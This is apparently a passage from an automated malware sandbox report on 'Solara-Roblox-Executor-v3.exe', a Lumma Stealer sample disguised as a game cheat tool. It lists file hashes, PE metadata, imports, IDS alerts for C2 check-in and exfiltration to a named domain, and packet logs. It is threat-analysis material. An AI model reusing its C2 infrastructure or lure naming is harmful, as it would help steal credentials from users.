                                                                                        • 13.107.246.45
                                                                                        zhMQ0hNEmb.exeGet hashmaliciousLummaCBrowse
                                                                                        • 13.107.246.45
                                                                                        2RxMkSAgZ8.exeGet hashmaliciousLummaCBrowse
                                                                                        • 13.107.246.45
                                                                                        bzzF5OFbVi.exeGet hashmaliciousLummaCBrowse
                                                                                        • 13.107.246.45
                                                                                        6684V5n83w.exeGet hashmaliciousVidarBrowse
                                                                                        • 13.107.246.45
                                                                                        Bp4LoSXw83.lnkGet hashmaliciousUnknownBrowse
                                                                                        • 13.107.246.45
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        CLOUDFLARENETUSDelta.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.96.1
                                                                                        Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.52.90
                                                                                        setup.msiGet hashmaliciousUnknownBrowse
                                                                                        • 188.114.97.3
                                                                                        NL Hybrid.exeGet hashmaliciousTitanium Proxy, PureLog StealerBrowse
                                                                                        • 104.21.24.64
                                                                                        over.ps1Get hashmaliciousVidarBrowse
                                                                                        • 172.64.41.3
                                                                                        NL Hybrid.exeGet hashmaliciousTitanium Proxy, PureLog StealerBrowse
                                                                                        • 172.67.217.81
                                                                                        http://trezorbridge.org/Get hashmaliciousUnknownBrowse
                                                                                        • 104.16.79.73
                                                                                        http://knoxoms.comGet hashmaliciousUnknownBrowse
                                                                                        • 188.114.97.3
                                                                                        EdYEXasNiR.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                        • 188.114.96.3
                                                                                        SMmAznmdAa.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.48.1
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        a0e9f5d64349fb13191bc781f81f42e1Delta.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.96.1
                                                                                        Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.96.1
                                                                                        SMmAznmdAa.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.96.1
                                                                                        zhMQ0hNEmb.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.96.1
                                                                                        2RxMkSAgZ8.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.96.1
                                                                                        Dl6wuWiQdg.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                        • 104.21.96.1
                                                                                        bzzF5OFbVi.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.96.1
                                                                                        PO#5_tower_Dec162024.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                        • 104.21.96.1
                                                                                        x6VtGfW26X.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.96.1
                                                                                        re5.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.96.1
                                                                                        No context
                                                                                        No created / dropped files found
                                                                                        File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                        Entropy (8bit):7.820425867551472
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                        File name:Solara-Roblox-Executor-v3.exe
                                                                                        File size:814'592 bytes
                                                                                        MD5:d2b09b1bda10143724a24534e31d44db
                                                                                        SHA1:6838edf7603b3a2be8195f5029223c808cdde9a4
                                                                                        SHA256:0336d6c3b8629f426c417a0999b65f74e804d11b28412482d72a004a9c6019a1
                                                                                        SHA512:0274d0ac02d12c5a71d1b03e38be8a1ce6c3b2bd4553f96f3225cd68ef25f8097e22ec516b06d72d9cdafc20dbaed4424a52e9b1abb2eec7a9f7ee5a3c86f4d8
                                                                                        SSDEEP:24576:FK1PSMZAM9AlqJkztYouKM9AlqJkztYoub:A1PS4AM9WqJTKM9WqJTb
                                                                                        TLSH:2905021134C08072D9B7357B19F9D7B6563EE9200F12AADF5B880F7A8F361C19B7462A
                                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....sg.................H........................@.......................................@.....................................(..
                                                                                        Icon Hash:00928e8e8686b000
                                                                                        Entrypoint:0x40a2e0
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows cui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                        DLL Characteristics:DYNAMIC_BASE, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x6773E4A4 [Tue Dec 31 12:33:40 2024 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:6
                                                                                        OS Version Minor:0
                                                                                        File Version Major:6
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:6
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:019ac8c6e24f80fb88de699b6749f599
                                                                                        Instruction
                                                                                        call 00007F01787E026Ah
                                                                                        jmp 00007F01787E00CDh
                                                                                        mov ecx, dword ptr [004307C0h]
                                                                                        push esi
                                                                                        push edi
                                                                                        mov edi, BB40E64Eh
                                                                                        mov esi, FFFF0000h
                                                                                        cmp ecx, edi
                                                                                        je 00007F01787E0266h
                                                                                        test esi, ecx
                                                                                        jne 00007F01787E0288h
                                                                                        call 00007F01787E0291h
                                                                                        mov ecx, eax
                                                                                        cmp ecx, edi
                                                                                        jne 00007F01787E0269h
                                                                                        mov ecx, BB40E64Fh
                                                                                        jmp 00007F01787E0270h
                                                                                        test esi, ecx
                                                                                        jne 00007F01787E026Ch
                                                                                        or eax, 00004711h
                                                                                        shl eax, 10h
                                                                                        or ecx, eax
                                                                                        mov dword ptr [004307C0h], ecx
                                                                                        not ecx
                                                                                        pop edi
                                                                                        mov dword ptr [00430800h], ecx
                                                                                        pop esi
                                                                                        ret
                                                                                        push ebp
                                                                                        mov ebp, esp
                                                                                        sub esp, 14h
                                                                                        lea eax, dword ptr [ebp-0Ch]
                                                                                        xorps xmm0, xmm0
                                                                                        push eax
                                                                                        movlpd qword ptr [ebp-0Ch], xmm0
                                                                                        call dword ptr [0042E8D8h]
                                                                                        mov eax, dword ptr [ebp-08h]
                                                                                        xor eax, dword ptr [ebp-0Ch]
                                                                                        mov dword ptr [ebp-04h], eax
                                                                                        call dword ptr [0042E894h]
                                                                                        xor dword ptr [ebp-04h], eax
                                                                                        call dword ptr [0042E890h]
                                                                                        xor dword ptr [ebp-04h], eax
                                                                                        lea eax, dword ptr [ebp-14h]
                                                                                        push eax
                                                                                        call dword ptr [0042E920h]
                                                                                        mov eax, dword ptr [ebp-10h]
                                                                                        lea ecx, dword ptr [ebp-04h]
                                                                                        xor eax, dword ptr [ebp-14h]
                                                                                        xor eax, dword ptr [ebp-04h]
                                                                                        xor eax, ecx
                                                                                        leave
                                                                                        ret
                                                                                        mov eax, 00004000h
                                                                                        ret
                                                                                        push 00431AB8h
                                                                                        call dword ptr [0042E8F8h]
                                                                                        ret
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        mov al, 01h
                                                                                        ret
                                                                                        push 00030000h
                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x2e6c40x28.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x340000xe8.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x350000x1b90.reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x2a9a80x18.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x26e400xc0.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x2e8340x148.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x10000x247da0x24800ba0610d1e4ecb6f5f64959d9eb5b455aFalse0.5549951840753424data6.559506263512015IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rdata0x260000x9eb40xa00053eba87ddc7d2455b0ac2836680b1660False0.428271484375DOS executable (COM)4.9181666163124085IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .data0x300000x22800x1600112d0c9e43893ae5b7f96d23807996acFalse0.39506392045454547data4.581141173428789IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .tls0x330000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .rsrc0x340000xe80x20003d6bf5d1e31277fc8fb90374111d794False0.306640625data2.344915704357875IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .reloc0x350000x1b900x1c003080b38ba0e27b64b3ab5ca0f93c1c7cFalse0.7785993303571429data6.532705218372571IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                        .BSS0x370000x4a4000x4a400f0bfd66820f6bd7ba7131c8790d125ceFalse1.0003320970117846data7.999394684755566IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .BSS0x820000x4a4000x4a400f0bfd66820f6bd7ba7131c8790d125ceFalse1.0003320970117846data7.999394684755566IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        RT_MANIFEST0x340600x87XML 1.0 document, ASCII textEnglishUnited States0.8222222222222222
                                                                                        DLLImport
                                                                                        KERNEL32.dllAcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                        EnglishUnited States
                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2024-12-31T17:23:06.437136+01002058656ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop)1192.168.2.5573431.1.1.153UDP
                                                                                        2024-12-31T17:23:06.923281+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.549704104.21.96.1443TCP
                                                                                        2024-12-31T17:23:06.923281+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549704104.21.96.1443TCP
                                                                                        2024-12-31T17:23:07.532015+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549704104.21.96.1443TCP
                                                                                        2024-12-31T17:23:07.532015+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549704104.21.96.1443TCP
                                                                                        2024-12-31T17:23:08.463581+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.549705104.21.96.1443TCP
                                                                                        2024-12-31T17:23:08.463581+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549705104.21.96.1443TCP
                                                                                        2024-12-31T17:23:08.907058+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549705104.21.96.1443TCP
                                                                                        2024-12-31T17:23:08.907058+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549705104.21.96.1443TCP
                                                                                        2024-12-31T17:23:09.664220+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.549706104.21.96.1443TCP
                                                                                        2024-12-31T17:23:09.664220+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549706104.21.96.1443TCP
                                                                                        2024-12-31T17:23:10.741890+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.549707104.21.96.1443TCP
                                                                                        2024-12-31T17:23:10.741890+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549707104.21.96.1443TCP
                                                                                        2024-12-31T17:23:12.278928+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.549708104.21.96.1443TCP
                                                                                        2024-12-31T17:23:12.278928+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549708104.21.96.1443TCP
                                                                                        2024-12-31T17:23:13.856635+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.549709104.21.96.1443TCP
                                                                                        2024-12-31T17:23:13.856635+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549709104.21.96.1443TCP
                                                                                        2024-12-31T17:23:14.427599+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549709104.21.96.1443TCP
                                                                                        2024-12-31T17:23:15.337203+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.549710104.21.96.1443TCP
                                                                                        2024-12-31T17:23:15.337203+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549710104.21.96.1443TCP
                                                                                        2024-12-31T17:23:18.415376+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.549711104.21.96.1443TCP
                                                                                        2024-12-31T17:23:18.415376+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549711104.21.96.1443TCP
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 31, 2024 17:23:06.457516909 CET49704443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:06.457534075 CET44349704104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:06.457617044 CET49704443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:06.458987951 CET49704443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:06.458995104 CET44349704104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:06.923199892 CET44349704104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:06.923280954 CET49704443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:06.929646015 CET49704443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:06.929653883 CET44349704104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:06.929847002 CET44349704104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:06.977802038 CET49704443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:07.111864090 CET49704443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:07.111888885 CET49704443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:07.111979008 CET44349704104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:07.532030106 CET44349704104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:07.532140970 CET44349704104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:07.532197952 CET49704443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:07.559921026 CET49704443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:07.559941053 CET44349704104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:07.849612951 CET49705443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:07.849638939 CET44349705104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:07.849713087 CET49705443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:07.850034952 CET49705443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:07.850052118 CET44349705104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:08.463354111 CET44349705104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:08.463581085 CET49705443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:08.465022087 CET49705443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:08.465035915 CET44349705104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:08.465291023 CET44349705104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:08.466490984 CET49705443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:08.466521978 CET49705443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:08.466557980 CET44349705104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:08.907066107 CET44349705104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:08.907126904 CET44349705104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:08.907155037 CET44349705104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:08.907180071 CET49705443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:08.907195091 CET44349705104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:08.907206059 CET44349705104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:08.907358885 CET49705443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:08.907373905 CET44349705104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:08.907421112 CET49705443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:08.907675028 CET44349705104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:08.907741070 CET44349705104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:08.907785892 CET49705443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:08.907793045 CET44349705104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:08.908253908 CET44349705104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:08.908287048 CET44349705104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:08.908304930 CET49705443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:08.908313990 CET44349705104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:08.908360004 CET49705443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:08.911674023 CET44349705104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:08.962137938 CET49705443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:08.995542049 CET44349705104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:08.995635033 CET44349705104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:08.995666027 CET44349705104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:08.995692968 CET49705443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:08.995702982 CET44349705104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:08.995744944 CET49705443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:08.995750904 CET44349705104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:08.995786905 CET44349705104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:08.995831013 CET49705443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:08.996834993 CET49705443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:08.996850967 CET44349705104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:08.996862888 CET49705443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:08.996866941 CET44349705104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:09.190922976 CET49706443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:09.190962076 CET44349706104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:09.191030025 CET49706443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:09.191288948 CET49706443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:09.191297054 CET44349706104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:09.664005995 CET44349706104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:09.664220095 CET49706443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:09.665476084 CET49706443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:09.665481091 CET44349706104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:09.665712118 CET44349706104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:09.666884899 CET49706443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:09.667011976 CET49706443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:09.667037010 CET44349706104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:10.168680906 CET44349706104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:10.168797016 CET44349706104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:10.168966055 CET49706443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:10.169003963 CET49706443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:10.169018030 CET44349706104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:10.285511971 CET49707443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:10.285577059 CET44349707104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:10.285657883 CET49707443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:10.285933971 CET49707443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:10.285952091 CET44349707104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:10.741821051 CET44349707104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:10.741889954 CET49707443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:10.768934965 CET49707443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:10.768951893 CET44349707104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:10.769215107 CET44349707104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:10.814692020 CET49707443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:10.814912081 CET49707443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:10.814946890 CET44349707104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:10.815006971 CET49707443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:10.815013885 CET44349707104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:11.637209892 CET44349707104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:11.637317896 CET44349707104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:11.637376070 CET49707443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:11.637482882 CET49707443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:11.637506008 CET44349707104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:11.819955111 CET49708443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:11.819994926 CET44349708104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:11.820067883 CET49708443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:11.820446014 CET49708443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:11.820462942 CET44349708104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:12.278779984 CET44349708104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:12.278928041 CET49708443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:12.279979944 CET49708443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:12.279992104 CET44349708104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:12.280194998 CET44349708104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:12.281213999 CET49708443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:12.281348944 CET49708443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:12.281380892 CET44349708104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:12.281455994 CET49708443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:12.281466007 CET44349708104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:12.890795946 CET44349708104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:12.890902996 CET44349708104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:12.890990973 CET49708443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:12.893824100 CET49708443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:12.893845081 CET44349708104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:13.388387918 CET49709443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:13.388418913 CET44349709104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:13.388530016 CET49709443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:13.388819933 CET49709443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:13.388832092 CET44349709104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:13.856425047 CET44349709104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:13.856635094 CET49709443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:13.970096111 CET49709443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:13.970114946 CET44349709104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:13.970323086 CET44349709104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:13.971477985 CET49709443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:13.971574068 CET49709443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:13.971580982 CET44349709104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:14.427613020 CET44349709104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:14.427712917 CET44349709104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:14.427809000 CET49709443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:14.428220034 CET49709443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:14.428236008 CET44349709104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:14.868647099 CET49710443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:14.868697882 CET44349710104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:14.868782043 CET49710443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:14.869168043 CET49710443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:14.869184971 CET44349710104.21.96.1192.168.2.5
